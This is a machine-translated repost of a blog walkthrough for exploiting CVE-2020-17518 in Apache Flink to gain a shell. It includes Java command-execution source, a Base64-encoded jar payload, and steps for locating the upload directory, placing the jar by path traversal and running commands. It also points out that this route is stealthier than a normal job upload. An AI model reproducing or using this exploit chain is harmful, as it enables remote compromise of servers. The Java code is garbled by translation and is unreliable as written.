Shulou(Shulou.com)05/31 Report--

This article introduces you from CVE-2020-17518 to one-button Getshell example analysis, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Recently, Apache Flink vulnerability CVE-2020-17518 has been exposed on the Internet, and its influence ranges from 1.5.1 to 1.11.2. The release cycle of the vulnerability is more than two years. After reading some loophole recurrence articles on the Internet, the EXP mentioned in the article mainly stays in the server to verify after writing files. In order to play a role in the actual combat, I want to try to construct an EXP that can Getshell.

0x001 Analysis and Utilization process 1.1 Environment Building

Use Vulfocus and Vulhub to build a CVE-2020-17518 vulnerability environment with one click.

1.2 experience of failure

Since you can upload through a directory, first consider uploading jsp to the Web directory, but the jsp script cannot be parsed under the Web directory, and the jsp file will be downloaded directly.

1.3 change ideas and get shell

Consider a breakthrough in the deployment of jar package getshell, which was previously exposed by Flink 1.9.x.

1.3.1 prepare the jar package

The main source code is as follows, which is used to execute system commands.

Import java.io.File;import java.util.Scanner;public class Execute {public Execute () {} public static void main (String [] args) throws Exception {String o = "; String cmd = args [0]; ProcessBuilder p If (System.getProperty ("os.name"). ToLowerCase (). Contains ("win") {p = new ProcessBuilder (new String [] {"cmd.exe", "/ c", cmd});} else {String pty = "/ bin/sh"; if ((new File ("/ bin/bash"). Exists ()) {pty = "/ bin/bash" } p = new ProcessBuilder (new String [] {pty, "- c", cmd});} Process s = p.start (); Scanner c = (new Scanner (s.getInputStream () .useDelimiter ("\ A"); c.close ();}}

The source code is compiled and packaged into a jar package, and the packaged jar package is transcoded into Base64 coding.

UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh4Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA

1.3.2 get the Flink running directory

The Flink runtime files are all in the / tmp directory, with a path similar to

/ tmp/flink-web-xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/

Each server runs Flink with a different path, so get that path first.

The path to web.tmpdir can be obtained through the interface / jobmanager/config.

1.3.3 upload jar package

The jar package can be uploaded to the / tmp/flink-web-f4aee131-987b-46d7-91af-754464a230b2/flink-web-upload/ directory by stitching the path and combining the CVE-2020-17518 vulnerability.

1.3.4 execute command, bounce shell

1.4 comparison of Jar package upload methods

Compared with uploading the jar package through "Submit New Job", the jar package uploaded by exploiting the CVE-2020-17518 vulnerability will not be displayed in the foreground, so it has a certain concealment.

0x002 uses Goby one-click Getshell

Goby super internal test version Beta 1.8.236 supports exploitation of this vulnerability.

This is the end of the sample analysis from CVE-2020-17518 to one-click Getshell. I hope the above content can be of some help and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.